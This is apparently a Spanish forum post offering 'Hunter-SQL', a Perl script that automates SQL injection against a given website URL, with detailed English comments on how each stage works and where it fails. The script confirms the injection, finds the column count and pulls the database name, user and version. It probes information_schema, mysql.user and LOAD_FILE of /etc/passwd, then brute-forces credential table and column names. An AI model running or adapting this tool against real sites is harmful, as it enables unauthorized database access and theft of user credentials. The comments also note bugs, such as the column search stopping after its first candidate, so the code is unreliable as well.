Lo que hace es:
* Comprueba la vulnerabilidad
* Busca columnas con 2 técnicas diferentes
* Saca información de la base de datos
* Comprueba mysql y schema, así como load file
* Busca tablas y columnas
Acá el código
#Name program = Hunter-SQL
#Version = 1.0
#Autor = Guason
use LWP::Simple;
use LWP::UserAgent;
use HTTP::Request;
# Candidate table names, tried one per HTTP request in come's table
# brute-force stage. Package global (the file has no "use strict").
# Several names repeat ('password', 'membername', 'autores') and are
# therefore requested twice.
@nombretabla=('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario',
'name','names','nombre','nombres','usuarios','member','members','admin_table',
'miembro','miembros','membername','admins','administrator',
'administrators','passwd','password','passwords','pass','Pass',
'tAdmin','tadmin','user_password','user_passwords','user_name','user_names',
'member_password','mods','mod','moderators','moderator','user_email',
'user_emails','user_mail','user_mails','mail','emails','email','address',
'e-mail','emailaddress','correo','correos','phpbb_users','log','logins',
'login','registers','register','usr','usrs','ps','pw','un','u_name','u_pass',
'tpassword','tPassword','u_password','nick','nicks','manager','managers','administrador',
'tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id',
'sistema_usuario','sistema_password','contrasena','auth','key','senha',
'tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member',
'tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization',
'membros','utilizadores','staff','nuke_authors','accounts','account','accnts',
'associated','accnt','customers','customer','membres','administrateur','utilisateur',
'tuser','tusers','utilisateurs','password','amministratore','god','God','authors',
'asociado','asociados','autores','membername','autor','autores','Users','Admin','Members',
'Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO');
# Candidate column names for come's column stage. 'user_name' and 'usr'
# appear twice. As the loop at the end of come is written (its exit
# sits inside the foreach body), only the first entry, 'admin_name', is
# ever tested; the rest of this list is never reached.
@nombrecolumna=('admin_name','cla_adm','usu_adm','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email',
'user_name','username','name','user','user_name','user_username','uname','user_uname','usern','user_usern','un','user_un','mail',
'usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','nombre','login_id','usr','sistema_id','author',
'sistema_usuario','auth','key','membername','nme','unme','psw','password','user_password','autores','pass_hash','hash','pass','correo',
'userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','authors',
'user_pwd','u_pass','clave','usuario','contrasena','pas','sistema_password','autor','upassword','web_password','web_username');
# Target base URL, taken verbatim from the first argument; the injectable
# parameter has to be the last thing in it (see the usage line). It is
# never validated or URL-encoded before being concatenated below.
my $host = $ARGV[0];
# Usage banner when no argument is given. The q(...) literal is printed
# as-is (no interpolation), so nothing can be annotated inside it.
if (!$ARGV[0]) {
print q (
¦ ¦ ¦ ¦ ¦ ¦ ¦¦¦ ¦¦¦¦ ¦¦¦ ¦¦¦ ¦¦ ¦
¦ ¦ ¦ ¦ ¦¦ ¦ ¦ ¦ ¦ ¦ ¦ ¦ ¦ ¦
¦ ¦ ¦ ¦ ¦¦ ¦ ¦ ¦ ¦ ¦ ¦ ¦ ¦ ¦
¦¦¦¦ ¦ ¦ ¦ ¦ ¦ ¦ ¦¦¦ ¦¦¦ ¦¦¦¦ ¦¦ ¦ ¦ ¦
¦ ¦ ¦ ¦ ¦ ¦¦ ¦ ¦ ¦ ¦ ¦ ¦ ¦ ¦
¦ ¦ ¦ ¦ ¦ ¦¦ ¦ ¦ ¦ ¦ ¦ ¦ ¦¦ ¦
¦ ¦ ¦¦ ¦ ¦ ¦ ¦¦¦¦ ¦ ¦ ¦¦¦ ¦ ¦ ¦¦¦¦
Modo de uso = perl hunter-sql.pl http://host.com/index.php?id=
Written by Guason
);
exit 1;
}
# Log file: bareword handle, two-argument open, hard-coded Windows path,
# and the return value is not checked. If the open fails, every later
# "print FILE" is silently lost (there is no "use warnings" here).
open ( FILE , ">>c:/hunter-log.txt" );
# $cmn is the "+" that stands in for a space between SQL keywords inside
# the URL; $cfin is the "--" that comments out the rest of the original
# query. Both are package globals built with ".=" rather than assigned.
$cmn.= "+";
$cfin.="--";
print "\n\n";
print q (
¦ ¦ ¦ ¦ ¦ ¦ ¦¦¦ ¦¦¦¦ ¦¦¦ ¦¦¦ ¦¦ ¦
¦ ¦ ¦ ¦ ¦¦ ¦ ¦ ¦ ¦ ¦ ¦ ¦ ¦ ¦
¦ ¦ ¦ ¦ ¦¦ ¦ ¦ ¦ ¦ ¦ ¦ ¦ ¦ ¦
¦¦¦¦ ¦ ¦ ¦ ¦ ¦ ¦ ¦¦¦ ¦¦¦ ¦¦¦¦ ¦¦ ¦ ¦ ¦
¦ ¦ ¦ ¦ ¦ ¦¦ ¦ ¦ ¦ ¦ ¦ ¦ ¦ ¦
¦ ¦ ¦ ¦ ¦ ¦¦ ¦ ¦ ¦ ¦ ¦ ¦ ¦¦ ¦
¦ ¦ ¦¦ ¦ ¦ ¦ ¦¦¦¦ ¦ ¦ ¦¦¦ ¦ ¦ ¦¦¦¦
);
print "[?] Verificando vulnerabilidad de $host.....\n\n";
# Stage 1: error-based check. Requests "<host>-1+union+select--" and
# declares the page vulnerable only if one of the verbose MySQL/PHP
# error fragments below shows up in the body. LWP::Simple::get returns
# undef on any HTTP failure; that matches nothing and is reported as
# "not vulnerable". The whole probe therefore depends on database
# errors being echoed into the page - a server that does not display
# them never gets past this point.
$sql=$host."-1".$cmn."union".$cmn."select".$cfin;
$response=get($sql);
if($response=~ /mysql_fetch_/ || $response=~ /You have an error in your SQL syntax/ || $response =~ /tem um erro de sintaxe no seu SQL/ || $response =~ /mysql_num_rows/ || $response =~ /Division by zero in/)
{
print "[+] Vulnerable, Siguiendo Parametros del Programa\n\n";
print FILE "\n\n";
print FILE "TARGET = $host\n\n";
} else {
print "[-] El sitio NO es vulnerable\n\n";
exit 1;
}
print "[+] Buscando numeros de columnas\n\n";
# Stage 2: column count, tried for 1..45 columns. 0x677561736f6e is the
# hex encoding of the ASCII string "guason"; each probe selects it in
# every column and the response body is searched for that string. The
# $union / $inyection accumulators are cleared on the first iteration
# (after the first ".=" has already run), so on iteration $column they
# hold exactly $column extra comma-separated terms.
for ($column = 0 ; $column < 45; $column ++)
{
$union.=','.$column;
$inyection.=','."0x677561736f6e";
if ($column == 0)
{
print FILE "\nNumero de columnas:\n\n";
$inyection = '';
$union = '';
}
$sql=$host."-1".$cmn."union".$cmn."select".$cmn."0x677561736f6e".$inyection.$cfin;
$response=get($sql);
if($response =~ /guason/)
{
# The loop index is 0-based, so bump it to the human-readable count
# before printing. come() exits the process in its last stage, so
# control does not come back to this loop after the call.
$column ++;
print "[+] El sitio tiene $column columnas\n\n";
$sql=$host."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cfin;
print FILE "\n\n";
print FILE"Inyeccion sql = $sql\n";
&come;
}
}
# Fallback when no column count matched: come() runs with $column == 45
# and $union holding all the terms "1".."44". The "&come;" form (no
# parentheses) also hands the caller's current @_ to the sub; come does
# not read @_, so it is harmless here, but it is an anti-pattern.
&come;
# Stages 3-8. Everything after the column search lives in this sub. It
# takes no arguments and reads the package globals set above ($host,
# $cmn, $cfin, $union, $inyection, $column, @nombretabla, @nombrecolumna,
# the FILE handle) and it never returns: its last stage calls exit.
# venga and hex_sql are written inside it textually, but Perl compiles
# named subs as ordinary package subs, so they are not closures over
# anything declared in come.
sub come {
print "[+] Extrayendo base de datos\n\n";
# Rebuild the working injection URL from the globals.
$sql=$host."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cfin;
my $url = $sql ;
# Split at the LAST "+" (the first group is greedy): $ura is everything
# up to and including "select", $numeros is the column list with the
# trailing "--".
($ura,$numeros) = $url =~ m{(.*)\+(.*)$}g;
print "\n";
print "Extrayendo datos de la url\n\n";
print "Url = $ura\n";
print "Numeros = $numeros\n";
print "\n";
# venga() sends one extra request to pick a reflected column at random,
# but its return value is overwritten by the literal "4" on the next
# line, so the first "4" in $numeros is always the position replaced.
# With fewer than five columns there is no "4", the substitution below
# is a no-op and the IN...FIN parse further down captures nothing.
$especial = venga($numeros);
$especial = "4";
# 0x494e = "IN", 0x3A = ":", 0x46494e = "FIN": delimiters around the
# database(), user() and version() values so they can be cut out of the
# response body.
$string_datos_db = 'concat(0x494e,database(),0x3A,user(),0x3A,version(),0x46494e)';
# $especial is interpolated unescaped as a regex; it is a single digit
# here, so only the first "4" is replaced.
$numeros =~s/$especial/$string_datos_db/;
$url = $ura."+".$numeros;
print "\n\n";
print "$url\n";
# A full LWP::UserAgent for this request; the HTTP status is never
# checked before the body is parsed.
my $cnx = LWP::UserAgent->new() or die;
$go=$cnx->get($url);
my $source = $go->content();
# Greedy captures between the IN/FIN markers; all three are undef when
# the markers are absent from the page.
($db,$user,$version) = $source =~ m{IN(.*):(.*):(.*)FIN}g;
print "\n\n";
print "\n\n";
print "Extrayendo base de datos\n\n";
print "Nombre de base = $db\n";
print "User = $user\n";
print "Version db = $version\n";
print "\n\n";
print FILE "\n\n";
print FILE "#############################################\n";
print FILE "Extrayendo base de datos\n\n";
print FILE "Nombre de base = $db\n";
print FILE "User = $user\n";
print FILE "Version db = $version\n";
print FILE "#############################################\n";
print FILE "\n\n";
# Picks one column position that is echoed back by the page, at random.
# Called once from come, which then discards the result (see above).
# "local $numeros" temporarily shadows the global $numeros that come is
# using; the global is restored when venga returns.
sub venga{
local $numeros = $_[0];
# split in scalar context yields the number of comma-separated fields,
# which here equals the column count (the "--" rides along in the last
# field).
$numeros = split(",",$numeros);
# Builds "0x...,0x...,..." from the hex encodings of "ACA1".."ACAn" so
# each column can be recognised by its number in the response. $url_hex
# is a global that is never cleared between calls.
for ($x=1;$x<=$numeros;$x++){
$url_hex = $url_hex.hex_sql("ACA$x").",";
}
chop($url_hex);
$url_inject = $ura."+".$url_hex."--";
print "\n\n";
print "$url_inject\n";
my $cnxe = LWP::UserAgent->new() or die;
$go=$cnxe->get($url_inject);
my $source_url_hex = $go->content();
# Every "ACA<n>" that comes back marks a column rendered in the page.
( @match_ACA) = $source_url_hex =~ m{ACA(\d+)}g;
# One-element array slice where $match_ACA[...] was meant; in scalar
# assignment it still yields that element. rand(@match_ACA) uses the
# array length, so this is a random echoed column, or undef if none.
$especial = @match_ACA[int(rand( @match_ACA))];
return $especial;
}
# Hex-encodes a string as a MySQL 0x literal, one byte per "%02lx". The
# "(.|\n)" alternation exists because "." does not match a newline
# without /s. The ($) prototype only imposes scalar context on the
# argument; it is not argument validation.
sub hex_sql($) {
(my $str = shift) =~ s/(.|\n)/sprintf("%02lx", ord $1)/eg;return "0x$str";
}
print "[+] Verificando existencia de Information_Schema\n\n";
# Stage 4: is information_schema.tables readable? Same marker probe as
# the column search, now with a FROM clause.
$sql=$host."-1".$cmn."union".$cmn."select".$cmn."0x677561736f6e".$inyection.$cmn."from".$cmn."information_schema.tables".$cfin;
$response=get($sql);
if($response =~ /guason/)
{
print "[+] Schema esta activado.......\n\n";
$sql=$host."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."information_schema.tables".$cfin;
# Last statement in the block, so the missing ";" is legal.
print FILE "\n\nInyeccion SQL para schema:\n\n$sql\n"
}
else
{
print "[-] Information Schema NO esta activada\n\n";
}
print "[+] Verificando existencia de Mysql User\n\n";
# Stage 5: same probe against mysql.user. Reading that table needs
# privileges an application account should not hold, so a least-
# privilege DB user fails this check.
$sql=$host."-1".$cmn."union".$cmn."select".$cmn."0x677561736f6e".$inyection.$cmn."from".$cmn."mysql.user".$cfin;
$response=get($sql);
if($response =~ /guason/)
{
print "[+] Mysql User esta activo\n\n";
$sql=$host."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."mysql.user".$cfin;
print FILE "Inyeccion SQL para mysqluser = $sql\n\n";
}
else
{
print "[-] Mysql User NO esta activado\n\n";
}
# Stage 6: LOAD_FILE. Adds $column-1 extra load_file() terms so that all
# $column columns carry one ($loadcont starts undef, i.e. 0). If come
# was reached through the fallback call, $column is 45 here.
while ($loadcont < $column-1)
{
$loadfile.=','.'load_file(0x2f6574632f706173737764)';
$loadcont++;
}
print "[+] Verificando existencia de LOAD-FILE...\n\n";
# 0x2f6574632f706173737764 is "/etc/passwd" (the log line below spells it
# out); success is detected by "root:x:" in the body. MySQL serves
# LOAD_FILE only to accounts holding the FILE privilege (and, where
# set, inside secure_file_priv), so a least-privilege account fails
# this probe.
$sql=$host."-1".$cmn."union".$cmn."select".$cmn."load_file(0x2f6574632f706173737764)".$loadfile.$cfin;
$response=get($sql);
if($response =~ /root:x:/)
{
print "[+] LOAD-FILE esta activo\n\n";
print FILE "load_file(0x2f6574632f706173737764) => OK! (0x2f6574632f706173737764 => /etc/passwd)\n\n";
} else {
print "[-] LOAD-FILE NO esta activado\n\n";
}
print "[+] Buscando Tablas.......\n\n";
print FILE " [Tablas]:\n\n";
# Stage 7: table-name brute force. Each candidate from @nombretabla is
# used as the FROM target, one HTTP request per candidate; a hit is any
# response containing the marker. chomp() on these literals is a no-op.
foreach $tabla(@nombretabla)
{
chomp($tabla);
$sql=$host."-1".$cmn."union".$cmn."select".$cmn."0x677561736f6e".$inyection.$cmn."from".$cmn.$tabla.$cfin;
$response=get($sql);
if($response =~ /guason/)
{
print "[?] Se encontro $tabla\n";
print FILE "$tabla\n";
}
}
print "\n\n";
print "Escribe el nombre de la tabla a brutear =";
# The table to work on is read from STDIN and spliced into the URL
# without any checking.
$tabla = <STDIN>;
chomp $tabla;
print "\n\n";
print FILE "\n\n[Columnas de la tabla $tabla]:\n\n";
# Stage 8: column-name brute force against that table. $columna is
# interpolated into the concat() call. NOTE: the three closing lines
# (two prints and exit) are inside the foreach body, so the process
# exits after testing only the first candidate, 'admin_name'.
foreach $columna(@nombrecolumna)
{
chomp($columna);
$sql=$host."-1".$cmn."union".$cmn."select".$cmn."concat(0x677561736f6e,0x3a,$columna)".$inyection.$cmn."from".$cmn.$tabla.$cfin;
$response=get($sql);
if ($response =~ /guason/)
{
print "[?] Se encontro $columna\n";
print FILE "$columna\n";
}
print "\n\n";
print "[?] El programa ha finalizado........\n\n";
# Exit status 1 even on the success path; nothing closes FILE.
exit 1;
}
}